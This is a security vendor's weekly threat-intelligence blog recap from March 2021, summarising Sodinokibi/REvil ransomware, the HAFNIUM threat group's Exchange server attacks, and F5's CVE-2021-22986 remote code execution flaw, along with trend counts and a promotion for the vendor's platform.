• Netenrich
  • /
  • Blog
  • /
  • KNOW What Happened This Week – Sodinokibi, HAFINUM, and CVE-2021-22986

KNOW What Happened This Week – Sodinokibi, HAFINUM, and CVE-2021-22986

Post by rajarshi Mar 25, 2021

Welcome to our weekly recap! KNOW, Netenrich’s threat intel platform and cybersecurity news aggregator, has identified Sodinokobi, HAFNIUM, and CVE-2021-22986 as the most trending malware, threat actor, and vulnerability.  

Sodinokibi – Malware Of The Week

Sodinokibi, also known as ‘REvil’, is a ransomware-as-a-service (RaaS) model discovered in April 2019. Its multiple infection vectors include exploiting known security vulnerabilities and phishing campaigns. Sodinokibi encrypts a user’s files and can gain administrative access by using a vulnerability in Oracle WebLogic CVE-2019-2725.

Shortly after the retirement of the GandCrab malware, the Sodinokibi came out. As per researchers, there are several similarities between the two malware. Sodinokibi captured everyone’s attention in May 2019 when they exploited an Oracle Zero-Day flaw and encrypted files on the target system. The hackers demanded a $2,500 ransom. If the victims miss the initial deadline, the ransom would then double to $5,000. The interesting thing to note here is that the Sodinokibi tries to avoid infecting computers from Iran, Russia, and other countries that were formerly part of the USSR.

Why is Sodinokibi Trending?

Taiwanese electronics and computer maker Acer was attacked by the Sodinokibi (REvil) ransomware. The hackers accessed financial spreadsheets, bank balances, and bank communications, reportedly compromising its network via a Microsoft Exchange server vulnerability (more on this in a bit). 

The ransomware gang has announced the hack on their data lead site, saying and asked for a massive $50 million ransom. This is the largest known ransom in history. Regarding the story, Acer said:

“Companies like us are constantly under attack, and we have reported recent abnormal situations observed to the relevant law enforcement and data protection authorities in multiple countries.”

Sodinokibi Trends From KNOW

revil

  • Total references: 24,000
  • Last 60 days: 2,000
  • Previous 7 days: 1,000

Sodinokibi Context From KNOW

  • Related IPs: 3 
  • Hashes: 329 
  • Industries Targeted: Education, Healthcare, Telecommunications, Banking, Finance, and Food & Beverage 
  • Vulnerabilities: CVE-2018-8453, CVE-2019-2725, CVE-2019-19781, and CVE-2019-11510.
  • Threat Actors: Carbank and Gold Southfield.

HAFNIUM – Threat Actor Of The Week

Hafnium is a highly sophisticated threat actor group from China. The Group had been exposed by Microsoft in March 2021 and is notable in targeting US entities for Data Exfiltration from several industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs. Hafnium primarily targets Microsoft Exchange Servers.

It gains access to any exchange server by using stolen passwords or by exploiting any vulnerabilities. It then would create a web shell to control the compromised devices remotely. For this, the Group uses US-based VPS servers to conduct data exfiltration. Exfiltrated contents are passed to popular file-sharing site MEGA.

Why Is HAFNIUM Trending?

Reports came out that HAFNIUM and four other hacking groups have been exploiting Microsoft’s business email servers. HAFNIUM targets entities in the US across industry sectors like infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

As per a research report released by Microsoft:

“HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.”

HAFNIUM References From KNOW

HAFINUM

  • Total references: 2,000
  • Last 60 days: 2,000
  • Previous 7 days: 265

Twitter Reacts To HAFNIUM

 

CVE-2021-22986 – Vulnerability Of The Week

CVE-2021-22986 hit the news lately when F5 Networks, a leading provider of enterprise networking gear, has announced four critical remote code execution (RCE) vulnerabilities affecting most BIG-IP and BIG-IQ software versions.

These vulnerabilities include:

  • CVE-2021-22986
  • CVE-2021-22987
  • CVE-2021-22991
  • CVE-2021-22992

The most critical one is CVE-2021-22986, and it can be exploited for unauthenticated, remote code execution attacks. F5 discovered two attack vectors that attempted to execute code on the vulnerable server. 

  • The first one is an attack chain that contains an SSRF attack and attempts to gain an authenticated session token as the first level, followed by remote command execution as the second level. 
  • The second vector is a remote command execution (RCE) that targeted the “mgmt/tm/util/bash” URL, which allows an authenticated user to execute commands using the ‘utilCmdArgs’ parameter.

Twitter Reacts To CVE-2021-22986

 

 

What is KNOW?

KNOW is Netenrich’s Threat Intel Platform that extracts data from billions of data points and correlates relevant intel and expert analyst insights to help you follow, search, and act—in a fraction of the time it takes now.

One of KNOW’s handiest tools is the trending threats dashboard, which gives you a bird’s eye view of the most potent malware, threat actors, methods, and vulnerabilities in the following time frames:

  • Last 7 days.
  • Last 60 days.

So, want to check out KNOW some more? Why don’t you sign up? It’s completely free.

 

rajarshi

About the Author

rajarshi

Subscribe To Our Newsletter!

The best source of information for Security, Networks, Cloud, and ITOps best practices. Join us.

Thank you for subscribing!

Related Post

Two people typing on a computer keyboard under a dark room
Apr 16 2021

KNOW What Happened This Week: BokBot, APT29 The Dukes, CVE-2

US, Canada, and UK Blames Russian Government for S...

Read More
know cybersecurity news
Apr 02 2021

KNOW The Cybersecurity Pulse in March – Black KingDom,

A quick look at the most trending cybersec news an...

Read More
cve-2020-29583 threat intelligence definition
Jan 08 2021

CVE-2020-29583 – Do You KNOW This Vulnerability?

According to the researchers, around 100,000 Zyxel...

Read More